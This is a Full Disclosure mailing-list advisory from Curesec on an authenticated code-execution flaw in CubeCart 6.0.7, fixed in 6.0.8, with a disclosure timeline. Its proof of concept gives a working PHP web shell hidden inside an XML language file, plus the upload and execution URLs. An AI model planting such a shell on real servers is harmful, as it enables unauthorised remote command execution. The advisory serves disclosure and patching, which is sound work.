Full Disclosure mailing list archives

By Date By Thread CubeCart 6.0.7: Code Execution From: "Curesec Research Team (CRT)" <crt () curesec com>

Date: Tue, 03 Nov 2015 11:55:41 +0100

Security Advisory - Curesec Research Team 1. Introduction Affected Product: CubeCart 6.0.7 Fixed in: 6.0.8 Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Vendor Contact: sales () cubecart com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When importing a language from a language file, it is only checked that the file contains valid XML, but the original extension of the file is kept, which makes it possible to gain code execution by uploading a file containing PHP code. Please note that admin credentials are required. 3. Proof of Concept Create a language file with valid XML and a file name like en.php with PHP code inside: <language version="2.0"> <info> <title> <![CDATA[My Language (UK)]]> </title> <code>My <?php passthru($_GET['x']);?>Language</code> <character_set>utf-8</character_set> <version>1.0.0</version> <minVersion>5.0.0a</minVersion> <maxVersion>5.1.*</maxVersion> <default_currency>GBP</default_currency> <text-direction>ltr</text-direction> <override/> </info> <translation> <group name="address"> <string name="state"> <![CDATA[County]]></string> </group> </translation> </language> Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g= settings&node=language#lang_import And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/ language/en.php?x=ls%20-alF 4. Solution To mitigate this issue please upgrade at least to version 6.0.8: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip Please note that a newer version might already be available. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: CubeCart 6.0.7: Code Execution Curesec Research Team (CRT) (Nov 06)